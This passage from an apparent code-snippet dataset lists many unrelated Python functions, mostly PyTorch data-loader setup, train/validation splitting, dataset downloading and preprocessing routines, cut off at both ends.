validation data.\n input_test_path = self.test_path_file\n target_test_path = self.test_path_file_target\n test_input, test_input_length, _ = self.data_to_token_ids(input_test_path, target_test_path, train=False)\n\n # Collect data into a list\n training_data = [train_input, train_input_length, train_labels]\n test_data = [test_input, test_input_length]\n\n # Save all the data\n with open(self.path_target_train, 'wb') as f:\n pickle.dump(training_data,f)\n with open(self.path_target_test, 'wb') as f:\n pickle.dump(test_data, f)\n else:\n # Load data\n with open(self.path_target_train, 'rb') as f:\n training_data = pickle.load(f)\n with open(self.path_target_test, 'rb') as f:\n test_data = pickle.load(f)\n\n # Initialize vocabulary\n self.initialize_vocabulary()\n\n # Convert list into a numpy array - train data\n train_input = pd.DataFrame(training_data[0]).fillna(value=0).astype(int).values\n train_length_input = np.array(training_data[1], dtype=int)\n train_labels = np.array(training_data[2], dtype=int)\n\n # Convert list into a numpy array - test data\n test_input = pd.DataFrame(test_data[0]).fillna(value=0).astype(int).values\n test_length_input = pd.DataFrame(test_data[1]).fillna(value=0).astype(int).values\n\n # Printing maximum length\n print(\"Shape of the input training matrix {}\".format(str(train_input.shape)))\n print(\"Shape of the input test matrix {}\".format(str(test_input.shape)))\n\n # Copy the files\n self.copy_files()\n\n # Return output\n return train_input, train_length_input, train_labels, test_input, test_length_input", "def train_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_train, **self.dl_kwargs)", "def dataloaders():\n # train data path\n data_train = '../dataset/train/'\n # set transformations\n train_transforms = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n train_data = datasets.ImageFolder(data_train, transform = train_transforms)\n trainloader = torch.utils.data.DataLoader(train_data, batch_size = 16, shuffle = True)\n \n return trainloader", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _init_loaders(self):\n @self.loaders_wrapper(\"nx2nx\")\n def get_nx2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.nx2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n @self.loaders_wrapper(\"neo4j2nx\")\n def get_neo4j2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n\n @self.loaders_wrapper(\"neo4j2edgelist\")\n def get_neo4j2edgelist_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2edgelist_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )\n\n\n @self.loaders_wrapper(\"edgelist2neo4j\")\n def get_edgelist2neo4j_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.edgelist2neo4j_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )", "def init_dataset(validation_dataset_name):\n transform = transforms.Compose([transforms.ToPILImage(),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n if validation_dataset_name == 'datasetRAP':\n # validation = 8317 images = 166 batches of 50 images + 1 batch of 17 images\n dataset_valid = loader_rapdataset_yiqiang.RAPDataset(0,False,'/storage/Datasets/Rap-PedestrianAttributeRecognition/',transform)\n labels = loader_rapdataset_yiqiang.ATTRIBUTES\n datset_attr_nbr = 92\n elif validation_dataset_name == 'datasetPETA':\n dataset_valid = loader_peta_dataset.PETADataset(False, '/storage/Datasets/PETA-PEdesTrianAttribute', transform)\n labels = loader_peta_dataset.ATTRIBUTES\n datset_attr_nbr = 104\n elif validation_dataset_name == 'datasetRAPPETA':\n dataset_valid = loader_rap_plus_peta_dataset.RAPPlusPETADataset(False, '/storage/Datasets/Rap-PedestrianAttributeRecognition/', '/storage/Datasets/PETA-PEdesTrianAttribute', transform)\n labels = [peta_label for rap_label,peta_label in loader_rap_plus_peta_dataset.ATTRIBUTES]\n datset_attr_nbr = 49\n\n print (\"Dataset valid size :\", dataset_valid.__len__())\n print (\"Dataset Attributes number :\", datset_attr_nbr)\n assert (len(labels) == datset_attr_nbr)\n\n dataloader_valid = DataLoader(dataset_valid, batch_size=Param_Batchsize, shuffle=True, num_workers=Param_Nb_Workers)\n\n return dataloader_valid, dataset_valid", "def __init__(self, args):\n self.train_img_file = os.path.join(args.data_dir, args.train_img_file)\n self.train_lbl_file = os.path.join(args.data_dir, args.train_lbl_file)\n self.test_img_file = os.path.join(args.data_dir, args.test_img_file)\n self.test_lbl_file = os.path.join(args.data_dir, args.test_lbl_file)\n self.batch_size = args.batch_size\n self.num_workers = args.data_workders\n self.shuffle = True\n self.dataset_name = args.dataset_name\n self.pin_memory = False #args.cuda\n\n # check dataset files exist\n files = [self.train_img_file, self.train_lbl_file,\n self.test_img_file, self.test_lbl_file]\n for file in files:\n if not os.path.isfile(file):\n msg = \"Data file not found. Please check the path \" +\\\n \"or download files using scripts/download_files.py \"\n raise IOError(msg)", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def prepare_data():\n user_name = os.environ.get('USER')\n traintest_corpus = ResumeCorpus('/Users/' + user_name + '/Documents/Data')\n random.shuffle(traintest_corpus.resumes)\n\n for resume in traintest_corpus.resumes:\n try:\n review_text = pre_processing(resume[0])\n review_text = \" \".join(review_text)\n data_dict['data'].append(review_text)\n data_dict['label'].append(resume[1])\n except:\n pass", "def build_data_loader(txt_path, in_vocab_path, out_vocab_path,\n batch_size=1, drop_last=False, num_workers=0):\n dataset = PuncDataset(txt_path, in_vocab_path, out_vocab_path)\n batch_sampler = RandomBucketBatchSampler(dataset,\n batch_size=batch_size,\n drop_last=drop_last)\n collate_fn = TextAudioCollate()\n data_loader = DataLoader(dataset, batch_sampler=batch_sampler,\n collate_fn=collate_fn, num_workers=num_workers)\n return data_loader", "def prep_base(self):\n\n self.config.logger.info(\"Preparing base layer land use data...\")\n\n # set start time\n t0 = time.time()\n\n # extract and process base layer land cover data\n base_data = rdr.read_base(self.config, self.observed_landclasses, self.sequence_metric_dict,\n metric_seq=self.metric_sequence_list, region_seq=self.region_sequence_list)\n\n # unpack variables\n self.spat_ludata, self.spat_water, self.spat_coords, self.spat_aez_region, self.spat_grid_id, self.spat_aez, \\\n self.spat_region, self.ngrids, self.cellarea, self.celltrunk, self.sequence_metric_dict = base_data\n\n self.config.logger.info('PERFORMANCE: Base spatial landuse data prepared in {0} seconds'.format(time.time() - t0))", "def create_train_dataloader(configs):\n train_lidar_aug = OneOf([\n Random_Rotation(limit_angle=np.pi / 4, p=1.0),\n Random_Scaling(scaling_range=(0.95, 1.05), p=1.0),\n ], p=0.66)\n train_dataset = KittiDataset(configs, mode='train', lidar_aug=train_lidar_aug, hflip_prob=configs.hflip_prob,\n num_samples=configs.num_samples)\n train_sampler = None\n if configs.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, batch_size=configs.batch_size, shuffle=(train_sampler is None),\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=train_sampler)\n\n return train_dataloader, train_sampler", "def _custom_data_loader(self) -> DataLoader:\n dataloaders = DataLoader(self.dataset, batch_size=1)\n return dataloaders", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()", "def data_loaders(dataset_path):\n dataset_path = dataset_path\n news_stock_dataset = NewsStockDataLoader(dataset_path)\n \n dataset_size = len(news_stock_dataset)\n indices = list(range(dataset_size))\n training_split = int(0.8 * dataset_size)\n validation_split = int(0.9 * dataset_size)\n\n np.random.seed(96)\n np.random.shuffle(indices)\n\n train_indices = indices[:training_split]\n valid_indices = indices[training_split:validation_split]\n test_indices = indices[validation_split:]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(valid_indices)\n test_sampler = SubsetRandomSampler(test_indices)\n \n collate = PadSequence()\n\n training_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"training_batch_size\"),\n sampler = train_sampler,\n collate_fn = collate)\n\n validation_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"validation_batch_size\"),\n sampler = valid_sampler,\n collate_fn = collate)\n\n testing_loader = DataLoader(news_stock_dataset,\n num_workers = 1,\n batch_size = Config.get(\"testing_batch_size\"),\n sampler= test_sampler,\n collate_fn = collate)\n \n return training_loader, validation_loader, testing_loader", "def prepare_data(self):\n import subprocess\n # Download coco data set into dir specified by config then /data/coco\n subprocess.call([f\"{get_original_cwd()}/bin/fetch_dataset.sh\", f\"{self.dir}/data/coco\", f\"{get_original_cwd()}\"])\n # subprocess.call([f\"bin/fetch_dataset.sh\", f\"{self.dir}/data/coco\"])\n task = \"instances\" if self.instance else \"person_keypoints\"\n register_coco_instances(\"train\", {}, f\"{self.dir}/data/coco/{task}_train2014.json\",\n f\"{self.dir}/data/coco/train2014\")\n register_coco_instances(\"val\", {}, f\"{self.dir}/data/coco/{task}_minival2014.json\",\n f\"{self.dir}/data/coco/val2014\")\n register_coco_instances(\"test\", {}, f\"{self.dir}/data/coco/{task}_valminusminival2014.json\",\n f\"{self.dir}/data/coco/val2014\")", "def __initDataFromImages(self):\n #Check if the local_db exist\n initial_dirs = os.listdir(os.getcwd())\n is_db_empty = False\n if len(os.listdir(self.base_dir)) == 1: #Empty here means no person data\n [images_dir] = os.listdir(self.base_dir)\n is_db_empty = images_dir == cfg.local[\"IMG_DIR\"]\n if cfg.local[\"DEFAULT_IMGS_DIR\"] in initial_dirs and is_db_empty:\n default_path = os.path.join(os.getcwd(), cfg.local[\"DEFAULT_IMGS_DIR\"])\n self.X, self.y = loadDataFromImagesPath(self.detector, default_path)\n self.le = LabelEncoder()\n #Nothing relate to mapping name to dir here, we don't care about\n #This data because of the user doesn't exist in the database\n self.__savePreProcessedData()", "def _load_training_data(self):\n self._save_training_data()", "def init_batch(self):\n pass", "def build_data_set(self):\n if not self.assert_data_correct():\n self.download_all_data()\n self.unpack_rename_data()\n self.split_data_characters()\n self.clean_data_fragments()\n self.create_font_data()\n if not self.assert_train_augmented():\n self.augment_train_data()\n if not self.assert_style_data_correct():\n self.download_style_data()\n self.unpack_rename_data()", "def _make_data(self):\n pdf_datasets_all = make_pdf_datasets(self.pdf_list, self.xlims, self.ylims, self.tlims, self.dims, 9)\n self.pdf_dataset = np.concatenate(pdf_datasets_all, axis = 0)\n self.PDE_dataset = make_PDE_dataset(self.num_collocation, self.xlims, self.ylims, self.tlims, self.dims)\n self.BC_dataset = make_BC_dataset(self.num_BC, self.xlims, self.ylims, self.tlims, self.dims)", "def init(self, **kwargs):\n self._d = {}\n self._th = None\n self._run = True\n self.load()", "def data_loaders(args):\n\n transform = transforms.Compose([\n transforms.Resize(64),\n transforms.ToTensor(),\n lambda image: (image - 0.5) * 2\n ])\n\n train_mnist = datasets.MNIST(\n root=args.database_root,\n train=True,\n download=True,\n transform=transform\n )\n train_loader = DataLoader(\n dataset=train_mnist,\n batch_size=args.train_batch_size,\n shuffle=True,\n num_workers=1,\n pin_memory=True\n )\n\n test_mnist = datasets.MNIST(\n root=args.database_root,\n train=False,\n download=True,\n transform=transform\n )\n test_loader = DataLoader(\n dataset=test_mnist,\n batch_size=args.test_batch_size,\n shuffle=True,\n num_workers=1,\n pin_memory=True\n )\n\n return train_loader, test_loader", "def get_loader(root_folder, batch_size=16, shuffle=False, num_workers=0, pin_memory=False):\n cal101_dset = get_dataset(root_folder) \n\n # train test split \n split_ratio = 0.2 \n dataset_size = len(cal101_dset)\n indices = np.arange(dataset_size)\n np.random.shuffle(indices)\n split = int(np.floor(split_ratio * dataset_size))\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = data.SubsetRandomSampler(train_indices)\n valid_sampler = data.SubsetRandomSampler(val_indices) \n\n train_loader = data.DataLoader( cal101_dset, batch_size=batch_size, \n shuffle=shuffle,num_workers=num_workers, sampler=train_sampler, pin_memory=pin_memory)\n validation_loader = data.DataLoader(cal101_dset, batch_size=batch_size,\n shuffle=shuffle,num_workers=num_workers, sampler=valid_sampler, pin_memory=pin_memory)\n\n return train_loader, validation_loader", "def __init__(self, data_dir: Path, config: Config):\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n\n training_path_list, ground_truth_path_list = get_file_paths(data_dir)\n\n X_train, X_test, y_train, y_test = self.train_test_split(\n training_path_list,\n ground_truth_path_list,\n test_portion=config.val_split,\n )\n\n train_dataset = TrainDataset(\n config, X_train, y_train, random_augmentation=True\n )\n val_dataset = TrainDataset(\n config, X_test, y_test, random_augmentation=False\n )\n\n self.train_loader = DataLoader(\n train_dataset,\n batch_size=config.train_batch_size,\n shuffle=True,\n pin_memory=True,\n )\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=config.test_batch_size,\n # No shuffle as it won't make any difference\n pin_memory=True,\n )\n\n model = UNet(INPUT_CHANNELS, OUTPUT_CHANNELS, config)\n self.model = DataParallel(model).to(self.device)\n\n if config.loss == \"logit_bce\":\n loss_weight = (\n self._get_loss_weight() if config.balanced_loss else None\n )\n # Using logits directly is numerically more stable and efficient\n self.class_loss_fn = BCEWithLogitsLoss(pos_weight=loss_weight)\n elif config.loss == \"soft_dice\":\n self.class_loss_fn = soft_dice_loss\n\n self.texture_transform = get_texture_transform(config)\n self.shape_loss_fn = ContrastiveLoss(config.temperature)\n\n self.optim = Adam(\n self.model.parameters(),\n lr=config.learn_rate,\n weight_decay=config.weight_decay,\n )\n max_steps = config.epochs * len(self.train_loader)\n self.scheduler = OneCycleLR(\n self.optim,\n max_lr=config.max_learn_rate,\n total_steps=max_steps,\n )\n self.scaler = GradScaler(enabled=config.mixed_precision)\n\n # Used when dumping hyper-params to a file\n self.config = config\n\n # To store best acc achieved so far\n self.best_acc = 0.0", "def setup(self):\n if not os.path.exists(self.save_dir):\n os.mkdir(self.save_dir)\n\n if self.configuration['load_checkpoint'] >= 0:\n last_checkpoint = self.configuration['load_checkpoint']\n else:\n last_checkpoint = -1\n\n if last_checkpoint >= 0:\n # enable restarting training\n self.load_networks(last_checkpoint)\n if self.is_train and self.scheduler != 'plateau':\n self.load_optimizers(last_checkpoint)\n for o in self.optimizers:\n o.param_groups[0]['lr'] = o.param_groups[0]['initial_lr'] # reset learning rate\n\n self.schedulers = [get_scheduler(optimizer, self.configuration) for optimizer in self.optimizers]\n\n if last_checkpoint > 0 and self.scheduler != 'plateau':\n for s in self.schedulers:\n for _ in range(last_checkpoint):\n s.step()\n\n self.print_networks()", "def __init__(self, data_config):\n self._brands = self._load_from_directory(data_config['targeted_brands_dir'])\n self._keywords = self._load_from_directory(data_config['keywords_dir'])\n self._fqdn_keywords = self._load_from_directory(data_config['fqdn_keywords_dir'])\n self._similarity_words = self._load_from_directory(data_config['similarity_words_dir'])\n self._tlds = self._load_from_directory(data_config['tld_dir'])", "def get_driving_data_loaders(batch_size, train_dataset, valid_dataset, test_dataset, num_workers=0): \n\n valid_loader = DataLoader(dataset=valid_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=True)\n\n train_loader = DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n drop_last=True, \n shuffle=True)\n\n test_loader = DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=False)\n\n return train_loader, valid_loader, test_loader", "def train_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def init_assigner_sampler(self):\n self.mask_assigner = []\n self.mask_sampler = []\n if self.train_cfg is not None:\n for idx, rcnn_train_cfg in enumerate(self.train_cfg):\n self.mask_assigner.append(\n build_assigner(rcnn_train_cfg.assigner))\n self.current_stage = idx\n self.mask_sampler.append(\n build_sampler(rcnn_train_cfg.sampler, context=self))", "def prepare_nfold_datasets(self): # i.e. split into different train/ground-truth(test) dataset\n for alpha in range(1, self.ALPHAs+1):\n if alpha != self.ALPHAs:\n gt_years = np.array2string(self.tl_model.years[(alpha-1)*self.PSI : alpha*self.PSI], separator='-')\n else:\n gt_years = np.array2string(self.tl_model.years[(alpha-1)*self.PSI : alpha*self.PSI+self.runoff_years], separator='-')\n new_cluster_dir = str(Path(self.tl_model.cluster_dir) / f'alpha_{alpha}_GT-{gt_years}')\n os.makedirs(new_cluster_dir, exist_ok=True)\n\n new_prepared_data_dir = str(Path(self.tl_model.prepared_data_dir) / f'alpha_{alpha}')\n os.makedirs(new_prepared_data_dir, exist_ok=True)\n \n if utils.find(f'*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir) and utils.find(f'*alpha_{alpha}_standardized_stacked_arr.pkl', new_prepared_data_dir):\n pass\n else:\n if not utils.find(f'*target*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir):\n print(f\"=> No input datasets pre-processed for alpha of {alpha}\")\n prepare.cut_target_dataset(self, alpha, new_prepared_data_dir)\n\n if not utils.find(f'*rf*alpha_{alpha}_preprocessed.pkl', new_prepared_data_dir):\n print(f\"=> No rainfall datasets pre-processed for alpha of {alpha}\")\n prepare.cut_rf_dataset(self, alpha, new_prepared_data_dir)\n \n print(f'Preprocessed pickles for alpha split {alpha} can be found @:\\n{new_prepared_data_dir}')", "def init_assigner_sampler(self):\n self.bbox_assigner = []\n self.bbox_sampler = []\n if self.train_cfg is not None:\n for idx, rcnn_train_cfg in enumerate(self.train_cfg):\n self.bbox_assigner.append(\n build_assigner(rcnn_train_cfg.assigner))\n self.current_stage = idx\n self.bbox_sampler.append(\n build_sampler(rcnn_train_cfg.sampler, context=self))", "def prepare_dataset(fpath):\n raise NotImplementedError", "def get_loaders(img_size=CONFIG[\"matrix_size\"], batch_size=CONFIG[\"batch_size\"],\n used_keypoints=CONFIG[\"used_keypoints\"], interpolation_frames=CONFIG[\"interpolation_frames\"],\n noise_frames=CONFIG[\"noise_frames\"], all_data=None, all_labels=None):\n\n if all_data is None or all_labels is None:\n all_data, all_labels = load_video_data_labels(interpolation_frames, noise_frames, used_keypoints, img_size)\n\n p = np.random.permutation(len(all_data))\n train_len = int(len(p) / 80)\n others_len = int((len(p) - train_len) / 2)\n\n train_data, train_labels = all_data[p[:train_len]], all_labels[p[:train_len]]\n val_data = all_data[p[train_len:train_len + others_len]]\n val_labels = all_labels[p[train_len:train_len + others_len]]\n test_data, test_labels = all_data[p[-others_len:]], all_labels[p[-others_len:]]\n\n # Transform to tensor\n train_data_tensor, train_labels_tensor = torch.from_numpy(train_data), torch.from_numpy(train_labels)\n val_data_tensor, val_labels_tensor = torch.from_numpy(val_data), torch.from_numpy(val_labels)\n test_data_tensor, test_labels_tensor = torch.from_numpy(test_data), torch.from_numpy(test_labels)\n\n # Data Loader for easy mini-batch return in training, load the Dataset from the numpy arrays\n train_loader = DataLoader(TensorDataset(train_data_tensor, train_labels_tensor), batch_size=batch_size)\n val_loader = DataLoader(TensorDataset(val_data_tensor, val_labels_tensor), batch_size=batch_size)\n test_loader = DataLoader(TensorDataset(test_data_tensor, test_labels_tensor), batch_size=batch_size)\n\n data = {\"train_data\": train_data,\n \"train_labels\": train_labels,\n \"val_data\": val_data,\n \"val_labels\": val_labels,\n \"test_data\": test_data,\n \"test_labels\": test_labels,\n \"all_data\": all_data[p],\n \"all_labels\": all_labels[p]}\n\n return data, train_loader, val_loader, test_loader", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def _load_templates(cls):\n if cls._raw_templates is None:\n cls._raw_templates = fetch_rrlyrae_templates()", "def __init__(self):\n print ('Initializing Data reader object...')\n data_Train_Images, data_Train_Labels, data_Test_Image, data_Test_Labels = self.readDataFromFile()\n test_10k_x, test_10k_y, training_55k_x, training_55k_y, validation_5k_x, validation_5k_y = self.dataTransform(\n data_Test_Image, data_Test_Labels, data_Train_Images, data_Train_Labels)\n self.train = zip(training_55k_x, training_55k_y)\n self.valid = zip(validation_5k_x, validation_5k_y)\n self.test = zip(test_10k_x, test_10k_y)\n\n self.train_position = 0\n print ('Initialized!')", "def setUpClass(cls):\n cls.test_file_1 = \"/tmp/test_data_loader_dummy_1.pkl\"\n cls.test_file_2 = \"/tmp/test_data_loader_dummy_2.pkl\"\n cls.in_cols = [\"file\", \"id\", \"len\", \"seq\", \"phyche\", \"pssm\", \"logits\",\n \"ss\", \"h_0\", \"h_1\", \"h_2\", \"lm_logits\"]\n cls.out_cols = [\"dataset\", \"id\", \"len\", \"position\", \"amino\",\n \"phyche\", \"pssm\", \"logits\", \"ss\", \"h_0\", \"h_1\", \"h_2\",\n \"lm_logits\"]\n\n seq = np.array([[0., 0., 1.],\n [1., 0., 0.]])\n phyche = np.array([[0., 0.], # phyche\n [1., 0.]])\n pssm = np.array([[0., 0., .8], # pssm\n [.8, 0., 0.]])\n logits = np.array([[0.1, 0., 0.9], # logits\n [0.9, 0., 0.1]])\n ss = np.array([[0., 0., 1.], # ss\n [1., 0., 0.]])\n h_0 = np.array([[0., 0., 1., 0.],\n [1., 0., 0., 0.]])\n h_1 = np.array([[0., 0., 1., 0.],\n [1., 0., 0., 0.]])\n h_2 = np.array([[0., 0., 1., 0.], # h_2\n [1., 0., 0., 0.]])\n lm_logits = np.array([[0., 0., 1.], # lm_logits\n [1., 0., 0.]])\n\n ex_1_in = (\"dummy_train.tfrecords\", # file\n \"id1\", # id\n 2, # len\n seq,\n phyche,\n pssm,\n logits,\n ss,\n h_0,\n h_1,\n h_2,\n lm_logits,\n )\n ex_1_out = [tuple([\"train\", ex_1_in[1], ex_1_in[2], j] + [ex_1_in[i][j, :] for i in range(3, len(ex_1_in))]) for j in range(2)]\n\n in_df = pd.DataFrame.from_records(data=[ex_1_in], columns=cls.in_cols)\n # write to file\n in_df.to_pickle(cls.test_file_1)\n\n cls.out_df = pd.DataFrame.from_records(data=ex_1_out, columns=cls.out_cols)", "def prepare_learning(self):\n print 'Separating inputs and outputs...'\n self.inputs, self.outputs = extract_samples(self.matches,\n self.input_features,\n self.output_feature)\n\n print 'Normalizing data...'\n self.normalizer, self.inputs = normalize(self.inputs)\n\n print 'Separating train and test sets...'\n self.train_inputs, self.train_outputs, self.test_inputs, self.test_outputs = split_samples(self.inputs, self.outputs)\n\n print 'Building neural network...'\n self.network = buildNetwork(len(self.input_features),\n 2 * len(self.input_features),\n 1,\n outclass=SigmoidLayer,\n bias=True)\n\n print 'Building and filling pybrain train set object...'\n self.train_set = ClassificationDataSet(len(self.input_features))\n\n for i, input_line in enumerate(self.train_inputs):\n self.train_set.addSample(self.train_inputs[i],\n [self.train_outputs[i] - 1])\n\n self.trainer = BackpropTrainer(self.network, dataset=self.train_set,\n momentum=0.5, weightdecay=0.0)\n\n self.train_set.assignClasses()", "def train(self, train_loader):\n pass", "def init_data(in_arg, model_param, phase=\"train\"): \n # Firstly, set the directories\n # PRE-REQUISITES: \n # train & valid sets (1 per folder) must exist within the in_arg.data_dir (to improve if I have some time later on)\n # train folder must be \"train\", validation folwer must be \"valid\"\n # each file must be correctly classified (=within the correct id folder). file name doesn't matter\n model_param['data_dir'] = in_arg.data_dir\n train_dir = model_param['data_dir'] + '/train'\n valid_dir = model_param['data_dir'] + '/valid'\n\n model_param['save_dir'] = in_arg.save_dir\n \n # Prepare the transformations for train & validation sets\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n valid_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n try:\n # Load the datasets with ImageFolder\n train_dataset = datasets.ImageFolder(train_dir, transform=train_transforms)\n valid_dataset = datasets.ImageFolder(valid_dir, transform=valid_transforms)\n\n model_param['class_to_idx'] = train_dataset.class_to_idx\n \n # TODO: Using the image datasets and the trainforms, define the dataloaders\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=in_arg.batch_size, shuffle = True)\n valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=in_arg.batch_size, shuffle = True)\n\n # Initialize the cat_to_name catalog\n #with open(in_arg.cat_to_name, 'r') as f:\n #cat_to_name = json.load(f)\n # model_param['cat_to_name'] = json.load(f)\n\n except Exception as e:\n print(\"An exception occured: {}.\".format(e))\n sys.exit(0)\n\n print(\"Data loading completed!\")\n\n # Return all parameters we will need later on\n return train_loader, valid_loader, model_param", "def get_dataloaders(data_dir,train_batch_size,val_batch_size,aug_flag):\n # Create the dataset object.\n transformed_dataset = PersonDataset(data_dir,False)\n # dataloader for train and validation\n validation_split = 0.2\n shuffle_dataset = True\n #random seed to keep the train-val split constant for inference purpose\n random_seed= 42\n # create indices for training and validation splits.\n dataset_size = len(transformed_dataset)\n # we create the indices using python range function and store it into a list\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split*dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices,val_indices = indices[split:],indices[:split]\n # create dataloaders...\n train_sampler = SubsetRandomSampler(train_indices)\n val_sampler = SubsetRandomSampler(val_indices)\n train_aug,val_aug = aug_flag,False\n train_loader = DataLoader(PersonDataset(data_dir,train_aug), batch_size=train_batch_size, shuffle=False, num_workers=0,sampler = train_sampler)\n val_loader = DataLoader(PersonDataset(data_dir,val_aug), batch_size=val_batch_size, shuffle=False, num_workers=0,sampler = val_sampler)\n\n # dictionary for data loaders..\n dataloaders = {\"train\" :train_loader,\n \"val\":val_loader\n }\n return dataloaders", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def setUpTestData(cls):\n data_gen.run()", "def load_data(batch_size=batch_size):\n trainset = LibriSpeechDataset(training_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds))\n testset = LibriSpeechDataset(validation_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds), stochastic=False)\n\n train_loader = DataLoader(trainset, batch_size=batch_size, num_workers=1, shuffle=True, drop_last=True)\n test_loader = DataLoader(testset, batch_size=1, num_workers=1, drop_last=True)\n\n return train_loader, test_loader", "def data_preprocessing():\n lineid_content = get_lineid_content()\n print('Read movie_lines.txt file complete...')\n convos = get_convos()\n print('Read movie_conversations.txt file complete...')\n print('Building dataset')\n get_data(lineid_content, convos)", "def setup_datasets(self):\r\n\r\n train_transform = transforms.Compose(\r\n [\r\n transforms.Resize(self.crop_size),\r\n transforms.RandomRotation(degrees=self.random_angle, resample=Image.BILINEAR),\r\n transforms.RandomResizedCrop(\r\n size=self.crop_size, scale=(1-self.random_scale, 1+self.random_scale), ratio=(1, 1)),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225]\r\n )\r\n ]\r\n )\r\n val_transform = transforms.Compose(\r\n [\r\n transforms.Resize(self.crop_size),\r\n transforms.CenterCrop(self.crop_size),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225]\r\n )\r\n ]\r\n )\r\n\r\n train_dataset = CocoDatasetPairs(\r\n root_dir=self.coco_path,\r\n set_name='train2014',\r\n transform=train_transform,\r\n dataset_size_ratio=self.dataset_size_ratio\r\n )\r\n train_subset_dataset = Subset(train_dataset, range(0, len(train_dataset), 5*self.dataset_size_ratio))\r\n val_dataset = CocoDatasetPairs(\r\n root_dir=self.coco_path,\r\n set_name='val2014',\r\n transform=val_transform,\r\n )\r\n\r\n train_loader = DataLoader(\r\n train_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=True,\r\n num_workers=self.num_workers\r\n )\r\n train_subset_loader = DataLoader(\r\n train_subset_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=False,\r\n num_workers=self.num_workers\r\n )\r\n val_loader = DataLoader(\r\n val_dataset,\r\n batch_size=self.batch_size,\r\n shuffle=False,\r\n num_workers=self.num_workers\r\n )\r\n return train_loader, train_subset_loader, val_loader", "def prepare_data(self, rm_orig: bool = False, tiling: bool = True) -> None:\n folders_found = [\n d.name\n for d in self.save_dir.iterdir()\n if d.name.lower() in (\"lizard_images1\", \"lizard_images2\", \"lizard_labels\")\n and d.is_dir()\n ]\n phases_found = [\n d.name\n for d in self.save_dir.iterdir()\n if d.name in (\"train\", \"test\", \"valid\") and d.is_dir()\n ]\n\n patches_found = []\n if phases_found:\n patches_found = [\n sub_d.name\n for d in self.save_dir.iterdir()\n if d.name in (\"train\", \"test\", \"valid\") and d.is_dir()\n for sub_d in d.iterdir()\n if sub_d.name\n in (\n f\"{d.name}_im_patches\",\n f\"{d.name}_mask_patches\",\n f\"{d.name}_patches\",\n )\n and any(sub_d.iterdir())\n ]\n\n if len(folders_found) < 3 and not phases_found:\n print(\n \"Found no data or an incomplete dataset. Downloading the whole thing...\"\n )\n for d in self.save_dir.iterdir():\n shutil.rmtree(d)\n LizardDataModule.download(self.save_dir)\n else:\n print(\"Found all folds. Skip downloading.\")\n\n if 